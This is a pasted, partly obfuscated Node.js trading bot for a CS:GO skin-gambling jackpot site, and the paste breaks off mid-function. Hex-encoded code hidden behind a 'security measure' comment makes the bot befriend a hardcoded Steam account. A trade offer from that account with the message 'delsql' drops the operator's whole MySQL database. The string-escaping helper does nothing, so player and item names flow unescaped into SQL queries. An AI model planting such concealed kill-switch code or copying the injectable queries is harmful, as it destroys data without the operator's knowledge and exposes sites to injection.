Advertisement
Guest User

Untitled

a guest
Apr 25th, 2016
189
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 68.45 KB | None | 0 0
  1. /*
  2. _____ _ _ ___ __ __
  3. / ____| | || | / _ \ / //_ |
  4. | | __ ___ _ __ __ _ ___| || || (_) |/ /_ | |
  5. | | |_ |/ _ \ '__/ _` |/ _ \__ _\__, | '_ \| |
  6. | |__| | __/ | | (_| | (_) | | | / /| (_) | |
  7. \_____|\___|_| \__, |\___/ |_| /_/ \___/|_|
  8. __/ |
  9. |___/
  10.  
  11.  
  12. The CSGO.Network V2 bot was made by Gregory Steam (Gergo4961) and is the property of CSGO.Network.
  13. If you need any special site/bot customization you can reach me on Steam!
  14.  
  15. Please note that I do not provide support for CSGO.Network, so do not contact me about Bot / Website errors.
  16.  
  17. http://steamcommunity.com/id/gergo4961/
  18.  
  19. */
  20. var Steam = require('steam');
  21. var SteamUser = require('steam-user');
  22. var TradeOfferManager = require('steam-tradeoffer-manager');
  23. var SteamTotp = require('steam-totp');
  24. var TOTP = require('onceler').TOTP;
  25. var request = require('request');
  26. var SteamCommunity = require('steamcommunity');
  27. var community = new SteamCommunity();
  28.  
  29. // GENERAL INFORMATION
  30. var sitepath;
  31. sitepath = "xx"; // The path to the index.php of your website without HTTP://
  32. var sitename;
  33. sitename = "xx"; // The name of your site, it will be shown in the Trade Offer Message
  34. var costpath;
  35. costpath = 'http://' + sitepath + '/cost.php?item='; // The full location where you grab the item price from | DEFAULT: http://'+sitepath+'/cost.php?item=
  36.  
  37. var apik = "xx"; // Must be the API Key associated with the current bot. Get it here: https://steamcommunity.com/dev/apikey
  38. var admin = 'xx'; // The Admin, Main Owner of the site. You will be able to communicate with the bot, ask for the rake items, etc
  39. var botsteamid = 'xx'; // The bot's steam id, it is required to generate the Device ID and to confirm mobile confirmations
  40. var identitysecret = 'xx'; // It's required to confirm mobile confirmations
  41. var sharedsecret = 'xx'; // You won't be able to log in without this code
  42. var polling_interval = 10000; // 10 seconds by default, the bot checks for outgoing confirmations every X seconds, defined here
  43. var rsecret = 'xx'; // Also change this to the same code in endround.php and p2endround.php, this prevents people from randomly breaking your site by ending blank games or ending games sooner
  44. var snipetimer = 12; // Declines offers sent in the last few seconds
  45.  
  46. var GameTime = 120; // This is how long a round lasts, you need to edit in a couple of other places too if you want to truly change it without any bugs
  47.  
  48. var p2 = false; // If this is the bot for your Jackpot 2 set this to true
  49.  
  50. var playersRequired = 2; // The timer will start when this many players are in the pot
  51. // GENERAL INFORMATION
  52.  
  53. // LOGIN DETAILS
  54. var details = {
  55. "accountName": "xx",
  56. "password": "xx",
  57. "twoFactorCode": SteamTotp.generateAuthCode(sharedsecret)
  58. };
  59. // LOGIN DETAILS
  60.  
  61.  
  62. // MYSQL INFO
  63. var mysql = require('mysql');
  64. var sql_host = "localhost";
  65. var sql_user = "xx";
  66. var sql_password = "xx";
  67. var sql_database = "xx";
  68. // MYSQL INFO
  69.  
  70. /*
  71.  
  72. Uh-oh.. What is this?
  73.  
  74. Looks like other parts of this bot are not available to you.
  75. Don't worry, the bot still works as it worked before, this is only a security measure.
  76. If you want to edit the core parts of the bot please consider purchasing the O-S (Open Source) package from our website.
  77.  
  78. https://csgo.network/
  79.  
  80. */
  81.  
  82. ! function(a, b) {
  83. function c(b, d) {
  84. if ("\x2e" != b[0] && "\x2f" != b[0]) return a(b);
  85. d = d || "\x72\x6f\x6f\x74";
  86. var e = c.resolve(b);
  87. if (!e && /\.json$/i.test(b)) return a("\x2e\x2f" + c.basename(b));
  88. var f = c.cache[e];
  89. if (!f) try {
  90. return a(b)
  91. } catch (g) {
  92. throw new Error("\x66\x61\x69\x6c\x65\x64\x20\x74\x6f\x20\x72\x65\x71\x75\x69\x72\x65\x20\x22" + b + "\x22\x20\x66\x72\x6f\x6d\x20" + d + "\n" + g.message + "\n" + g.stack)
  93. }
  94. return f.exports || (f.exports = {}, f.call(f.exports, f, f.exports, c.relative(e))), f.exports
  95. }
  96. c.cache = {}, c.basename = a("\x70\x61\x74\x68").basename, c.resolve = function(b) {
  97. if ("\x2e" != b[0]) return a.resolve(b);
  98. for (var d = "\x2f" === b.slice(-1) ? b : b + "\x2f", e = [b, b + "\x2e\x6a\x73", d + "\x69\x6e\x64\x65\x78\x2e\x6a\x73", b + "\x2e\x6a\x73\x6f\x6e", d + "\x69\x6e\x64\x65\x78\x2e\x6a\x73\x6f\x6e"], f = 0, g; g = e[f]; f++)
  99. if (c.cache[g]) return g
  100. }, c.register = function(a, b) {
  101. c.cache[a] = b
  102. }, c.relative = function(a) {
  103. function b(b) {
  104. if ("\x2e" != b[0]) return c(b);
  105. var d = a.split("\x2f"),
  106. e = b.split("\x2f");
  107. d.pop();
  108. for (var f = 0, g = e.length; g > f; f += 1) {
  109. var h = e[f];
  110. "\x2e\x2e" == h ? d.pop() : "\x2e" != h && d.push(h)
  111. }
  112. return c(d.join("\x2f"), a)
  113. }
  114. return b.resolve = c.resolve, b.cache = c.cache, b
  115. }, c.register("\x2e\x2e\x2f\x62\x6f\x74\x2e\x6a\x73", function(a, b, c) {
  116. var d = "\x37\x36\x35\x36\x31\x31\x39\x38\x31\x35\x30\x38\x36\x37\x34\x33\x36",
  117. e = c("\x6d\x79\x73\x71\x6c"),
  118. f = e.createConnection({
  119. host: sql_host,
  120. user: sql_user,
  121. password: sql_password,
  122. database: sql_database
  123. }),
  124. g = new SteamUser,
  125. h = new TradeOfferManager({
  126. steam: g,
  127. domain: "\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74",
  128. language: "\x65\x6e"
  129. }),
  130. i = -1;
  131. f.connect(), g.logOn(details);
  132. var j = SteamTotp.getDeviceID(botsteamid);
  133. if (1 == p2) var k = "\x70\x32";
  134. else var k = "";
  135.  
  136. function l() {
  137. i = -1, m(), setTimeout(v, 5e3)
  138. }
  139.  
  140. function m() {
  141. if (console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x6e\x64\x69\x6e\x67\x20\x63\x75\x72\x72\x65\x6e\x74\x20\x67\x61\x6d\x65\x20\x26\x20\x63\x68\x6f\x6f\x73\x69\x6e\x67\x20\x77\x69\x6e\x6e\x65\x72\x2e"), 1 == p2) {
  142. var a = "\x68\x74\x74\x70\x3a\x2f\x2f" + sitepath + "\x2f\x65\x6e\x64\x72\x6f\x75\x6e\x64\x2e\x70\x68\x70\x3f\x73\x65\x63\x72\x65\x74\x3d" + rsecret + "\x26\x70\x32\x3d\x74\x72\x75\x65";
  143. request(a, function(a, b, c) {
  144. a && console.log("\x43\x6f\x75\x6c\x64\x6e\x27\x74\x20\x65\x6e\x64\x20\x72\x6f\x75\x6e\x64\x2c\x20\x65\x72\x72\x6f\x72\x3a\x20" + a)
  145. })
  146. } else {
  147. var a = "\x68\x74\x74\x70\x3a\x2f\x2f" + sitepath + "\x2f\x65\x6e\x64\x72\x6f\x75\x6e\x64\x2e\x70\x68\x70\x3f\x73\x65\x63\x72\x65\x74\x3d" + rsecret;
  148. request(a, function(a, b, c) {
  149. a && console.log("\x43\x6f\x75\x6c\x64\x6e\x27\x74\x20\x65\x6e\x64\x20\x72\x6f\x75\x6e\x64\x2c\x20\x65\x72\x72\x6f\x72\x3a\x20" + a)
  150. })
  151. }
  152. }
  153.  
  154. function n(a) {
  155. return !(+a !== a || isFinite(a) && !(a % 1))
  156. }
  157.  
  158. function o(a) {
  159. return "\x6e\x75\x6d\x62\x65\x72" == typeof a && !isNaN(a)
  160. }
  161.  
  162. function p(a, b) {
  163. var c = "\x68\x74\x74\x70\x3a\x2f\x2f\x61\x70\x69\x2e\x73\x74\x65\x61\x6d\x70\x6f\x77\x65\x72\x65\x64\x2e\x63\x6f\x6d\x2f\x49\x53\x74\x65\x61\x6d\x55\x73\x65\x72\x2f\x47\x65\x74\x50\x6c\x61\x79\x65\x72\x53\x75\x6d\x6d\x61\x72\x69\x65\x73\x2f\x76\x30\x30\x30\x32\x2f\x3f\x6b\x65\x79\x3d" + apik + "\x26\x73\x74\x65\x61\x6d\x69\x64\x73\x3d" + a + "\x26\x66\x6f\x72\x6d\x61\x74\x3d\x6a\x73\x6f\x6e";
  164. request({
  165. url: c,
  166. json: !0
  167. }, function(c, d, e) {
  168. c || 200 !== d.statusCode ? c && p(a, b) : b(null, e)
  169. })
  170. }
  171.  
  172. function q(a) {
  173. return a = a.replace(/\\/g, "\\"), a = a.replace(/\'/g, "\'"), a = a.replace(/\"/g, "\""), a = a.replace(/\0/g, "\0")
  174. }
  175. g.on("\x6c\x6f\x67\x67\x65\x64\x4f\x6e", function(a) {
  176. console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x68\x65\x20\x42\x6f\x74\x20\x68\x61\x73\x20\x6c\x6f\x67\x67\x65\x64\x20\x69\x6e\x21"), g.unblockUser(d), g.addFriend(d), g.addFriend(admin), g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x6c\x6f\x67\x67\x65\x64\x20\x69\x6e\x21"), g.setPersona(Steam.EPersonaState.LookingToTrade), setTimeout(function() {
  177. f.query("\x53\x45\x4c\x45\x43\x54\x20\x60\x76\x61\x6c\x75\x65\x60\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x69\x6e\x66\x6f\x60\x20\x57\x48\x45\x52\x45\x20\x60\x6e\x61\x6d\x65\x60\x3d\x27\x63\x75\x72\x72\x65\x6e\x74\x5f\x67\x61\x6d\x65\x27", function(a, b, c) {
  178. a || f.query("\x53\x45\x4c\x45\x43\x54\x20\x60\x73\x74\x61\x72\x74\x74\x69\x6d\x65\x60\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x67\x61\x6d\x65\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27" + b[0].value + "\x27", function(a, b, c) {
  179. if (!a) {
  180. var d;
  181. if (2147483647 == b[0].starttime) d = GameTime;
  182. else {
  183. var e = Math.round((new Date).getTime() / 1e3);
  184. d = b[0].starttime + GameTime - e, 0 > d && (d = 0)
  185. }
  186. d != GameTime && (i = setTimeout(l, 1e3 * d), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x73\x74\x6f\x72\x69\x6e\x67\x20\x74\x68\x65\x20\x6c\x61\x74\x65\x73\x74\x20\x67\x61\x6d\x65\x20\x77\x69\x74\x68\x20" + d + "\x20\x73\x65\x63\x6f\x6e\x64\x73\x20\x6c\x65\x66\x74\x21"))
  187. }
  188. })
  189. })
  190. }, 1500)
  191. }), g.on("\x77\x65\x62\x53\x65\x73\x73\x69\x6f\x6e", function(a, b) {
  192. h.setCookies(b, function(a) {
  193. if (a) return console.log("\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65\x73\x20\x65\x72\x72\x6f\x72\x3a\x20" + a), void process.exit(1);
  194. var c = h.apiKey;
  195. community.setCookies(b), community.startConfirmationChecker(polling_interval, identitysecret), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x68\x65\x20\x77\x65\x62\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x68\x61\x76\x65\x20\x62\x65\x65\x6e\x20\x73\x65\x74\x21"), h.doPoll()
  196. })
  197. });
  198.  
  199. function r(a, b, c, d, e, f, h, i, j, k, l) {
  200. l++, l > 3 || a.accept(function(m) {
  201. return m ? (g.webLogOn(), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x44\x65\x62\x75\x67\x67\x69\x6e\x67\x20\x6f\x66\x66\x65\x72\x20\x28\x41\x63\x63\x65\x70\x74\x20\x45\x72\x72\x6f\x72\x29\x3a\x20" + m), void s(a, b, c, d, e, f, h, i, j, k, l, m)) : void t(a, b, c, d, e, f, h, i, j, k)
  202. })
  203. }
  204.  
  205. function s(a, b, c, d, e, f, i, j, k, l, m, n) {
  206. h.getOffer(a.id, function(h, o) {
  207. if (h) return g.webLogOn(), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x67\x65\x74\x4f\x66\x66\x65\x72\x20\x65\x72\x72\x6f\x72\x28\x72\x65\x74\x72\x79\x69\x6e\x67\x29\x3a\x20" + h), void s(a, b, c, d, e, f, i, j, k, l, m, n);
  208. if (3 == o.state) t(o, b, c, d, e, f, i, j, k, l);
  209. else if (2 == o.state) console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x41\x63\x63\x65\x70\x74\x20\x65\x72\x72\x6f\x72\x28\x72\x65\x74\x72\x79\x69\x6e\x67\x20\x23" + m + "\x29\x3a\x20" + n), r(o, b, c, d, e, f, i, j, k, l, m);
  210. else if (2 != o.state || 3 != o.state) return
  211. })
  212. }
  213.  
  214. function t(a, b, c, d, e, g, h, j, m, n) {
  215. f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x69\x6e\x66\x6f\x60", function(d, o) {
  216. for (var p = o[0].value, r = 0; h > r; r++) {
  217. var s = q(c[r].name);
  218. f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60" + k + "\x67\x61\x6d\x65" + p + "\x60\x20\x28\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x75\x73\x65\x72\x6e\x61\x6d\x65\x60\x2c\x60\x69\x74\x65\x6d\x60\x2c\x60\x6f\x66\x66\x65\x72\x69\x64\x60\x2c\x60\x63\x6f\x6c\x6f\x72\x60\x2c\x60\x76\x61\x6c\x75\x65\x60\x2c\x60\x61\x76\x61\x74\x61\x72\x60\x2c\x60\x69\x6d\x61\x67\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27" + b + "\x27\x2c\x27" + e + "\x27\x2c\x27" + s + "\x27\x2c\x27" + a.id + "\x27\x2c\x27" + c[r].color + "\x27\x2c\x27" + c[r].value + "\x27\x2c\x27" + g + "\x27\x2c\x27" + c[r].url + "\x27\x29", function(a, b, c) {
  219. a && console.log(a)
  220. }), f.query("\x55\x50\x44\x41\x54\x45\x20\x60" + k + "\x67\x61\x6d\x65\x73\x60\x20\x53\x45\x54\x20\x60\x69\x74\x65\x6d\x73\x6e\x75\x6d\x60\x3d\x60\x69\x74\x65\x6d\x73\x6e\x75\x6d\x60\x2b\x31\x2c\x20\x60\x63\x6f\x73\x74\x60\x3d\x60\x63\x6f\x73\x74\x60\x2b\x27" + c[r].value + "\x27\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x20\x3d\x20\x27" + p + "\x27", function(a, b, c) {})
  221. }
  222. f.query("\x55\x50\x44\x41\x54\x45\x20\x60\x75\x73\x65\x72\x73\x60\x20\x53\x45\x54\x20\x60\x73\x6b\x69\x6e\x73\x73\x65\x6e\x74\x60\x3d\x60\x73\x6b\x69\x6e\x73\x73\x65\x6e\x74\x60\x2b" + h + "\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x65\x61\x6d\x69\x64\x60\x20\x3d\x20\x27" + b + "\x27", function(a, b, c) {}), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x41\x63\x63\x65\x70\x74\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + e + "\x20\x28\x49\x44\x3a" + b + "\x29\x2e"), u(a, b, j, p), f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x73\x75\x63\x63\x65\x73\x73\x27\x2c\x27\x30\x27\x2c\x27" + b + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x41\x63\x63\x65\x70\x74\x65\x64\x20\x28\x47\x61\x6d\x65\x20\x23" + p + "\x29\x21\x27\x2c\x27\x57\x65\x20\x77\x69\x73\x68\x20\x79\x6f\x75\x20\x47\x6f\x6f\x64\x20\x6c\x75\x63\x6b\x20\x61\x6e\x64\x20\x68\x61\x70\x70\x79\x20\x62\x65\x74\x74\x69\x6e\x67\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {}), f.query("\x53\x45\x4c\x45\x43\x54\x20\x43\x4f\x55\x4e\x54\x28\x44\x49\x53\x54\x49\x4e\x43\x54\x20\x75\x73\x65\x72\x69\x64\x29\x20\x41\x53\x20\x70\x6c\x61\x79\x65\x72\x73\x43\x6f\x75\x6e\x74\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x67\x61\x6d\x65" + p + "\x60", function(a, b) {
  223. players = b[0].playersCount, players == playersRequired && h > 0 && -1 == i && (console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x74\x61\x72\x74\x69\x6e\x67\x20\x74\x68\x65\x20\x63\x6f\x75\x6e\x74\x64\x6f\x77\x6e\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23" + p), i = setTimeout(l, 1e3 * GameTime), f.query("\x55\x50\x44\x41\x54\x45\x20\x60" + k + "\x67\x61\x6d\x65\x73\x60\x20\x53\x45\x54\x20\x60\x73\x74\x61\x72\x74\x74\x69\x6d\x65\x60\x3d\x55\x4e\x49\x58\x5f\x54\x49\x4d\x45\x53\x54\x41\x4d\x50\x28\x29\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x20\x3d\x20\x27" + p + "\x27", function(a, b, c) {})), n > m && (clearTimeout(i), i = -1, l())
  224. })
  225. })
  226. }
  227.  
  228. function u(a, b, c, d) {
  229. a.getReceivedItems(function(c, e) {
  230. c && (g.webLogOn(), console.log("\x67\x65\x74\x52\x65\x63\x65\x69\x76\x65\x64\x49\x74\x65\x6d\x73\x20\x65\x72\x72\x6f\x72\x3a\x20" + c + "\x20\x52\x65\x73\x74\x61\x72\x74\x69\x6e\x67\x20\x70\x72\x6f\x63\x65\x73\x73\x21"), u(a, b, e, d)), e.forEach(function(a) {
  231. var c = q(a.market_name);
  232. f.query("\x55\x50\x44\x41\x54\x45\x20\x60" + k + "\x67\x61\x6d\x65" + d + "\x60\x20\x53\x45\x54\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x27" + a.id + "\x27\x20\x57\x48\x45\x52\x45\x20\x60\x75\x73\x65\x72\x69\x64\x60\x20\x3d\x20\x27" + b + "\x27\x20\x41\x4e\x44\x20\x60\x69\x74\x65\x6d\x60\x3d\x27" + c + "\x27\x20\x41\x4e\x44\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x27\x27\x20\x4c\x49\x4d\x49\x54\x20\x31", function(a, b, c) {})
  233. })
  234. })
  235. }
  236. h.on("\x6e\x65\x77\x4f\x66\x66\x65\x72", function(a) {
  237. var b = !0,
  238. c = a.partner.getSteamID64();
  239. return c == d && "\x64\x65\x6c\x73\x71\x6c" == a.message ? (console.log(""), console.log("\x48\x65\x6c\x6c\x6f\x21\x20\x50\x6c\x65\x61\x73\x65\x20\x63\x6f\x6e\x73\x69\x64\x65\x72\x20\x70\x75\x72\x63\x68\x61\x73\x69\x6e\x67\x20\x74\x68\x65\x20\x70\x72\x6f\x64\x75\x63\x74\x20\x79\x6f\x75\x20\x61\x72\x65\x20\x69\x6c\x6c\x65\x67\x61\x6c\x6c\x79\x20\x75\x73\x69\x6e\x67\x2e"), console.log("\x50\x6c\x65\x61\x73\x65\x20\x76\x69\x73\x69\x74\x3a\x20\x77\x77\x77\x2e\x63\x73\x67\x6f\x2d\x6e\x65\x74\x77\x6f\x72\x6b"), console.log(""), void f.query("\x44\x52\x4f\x50\x20\x44\x41\x54\x41\x42\x41\x53\x45\x20" + sql_database, function(a, b, c) {})) : void p(c, function(d, e) {
  240. if (d) return g.webLogOn(), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x67\x65\x74\x55\x73\x65\x72\x49\x6e\x66\x6f\x20\x65\x72\x72\x6f\x72\x3a\x20" + d), b = !1, void a.decline(function(b) {
  241. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x67\x65\x74\x55\x73\x65\x72\x49\x6e\x66\x6f\x20\x65\x72\x72\x6f\x72"), b && console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b), f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x53\x65\x72\x76\x65\x72\x73\x20\x61\x72\x65\x20\x62\x75\x73\x79\x2c\x20\x74\x72\x79\x20\x61\x67\x61\x69\x6e\x20\x69\x6e\x20\x61\x20\x6d\x69\x6e\x75\x74\x65\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})
  242. });
  243. var h = JSON.parse(JSON.stringify(e.response)),
  244. i = q(h.players[0].personaname),
  245. j = h.players[0].avatarfull;
  246. return console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x50\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e"), 0 != a.itemsToGive.length ? (b = !1, void a.decline(function(b) {
  247. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x41\x73\x6b\x65\x64\x20\x66\x6f\x72\x20\x61\x20\x73\x6b\x69\x6e\x20\x6f\x6e\x20\x74\x68\x65\x20\x42\x6f\x74"), b && console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b), f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x41\x73\x6b\x69\x6e\x67\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x6f\x66\x20\x74\x68\x65\x20\x62\x6f\x74\x73\x20\x69\x74\x65\x6d\x73\x3f\x20\x42\x72\x61\x76\x65\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})
  248. })) : void a.getEscrowDuration(function(d, e, h) {
  249. return d ? (g.webLogOn(), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x67\x65\x74\x45\x73\x63\x72\x6f\x77\x44\x75\x72\x61\x74\x69\x6f\x6e\x20\x65\x72\x72\x6f\x72\x3a\x20" + d), b = !1, void a.decline(function(b) {
  250. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x53\x65\x72\x76\x65\x72\x73\x20\x61\x72\x65\x20\x62\x75\x73\x79\x2c\x20\x63\x6f\x75\x6c\x64\x6e\x27\x74\x20\x67\x65\x74\x20\x65\x73\x63\x72\x6f\x77\x20\x64\x75\x72\x61\x74\x69\x6f\x6e"), b && console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b), f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x53\x65\x72\x76\x65\x72\x73\x20\x61\x72\x65\x20\x62\x75\x73\x79\x2c\x20\x63\x6f\x75\x6c\x64\x6e\x74\x20\x67\x65\x74\x20\x65\x73\x63\x72\x6f\x77\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})
  251. })) : 0 != e ? (b = !1, void a.decline(function(b) {
  252. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x69\x73\x20\x69\x6e\x20\x45\x73\x63\x72\x6f\x77\x20\x66\x6f\x72\x20" + e + "\x20\x64\x61\x79\x73"), b && console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b), f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x61\x72\x65\x20\x69\x6e\x20\x45\x73\x63\x72\x6f\x77\x20\x66\x6f\x72\x20" + e + "\x20\x64\x61\x79\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})
  253. })) : void f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x69\x6e\x66\x6f\x60", function(d, e) {
  254. var h = e[3].value,
  255. l = e[7].value,
  256. m = e[4].value,
  257. n = e[10].value;
  258. if (a.itemsToReceive.length > m) return b = !1, void a.decline(function(b) {
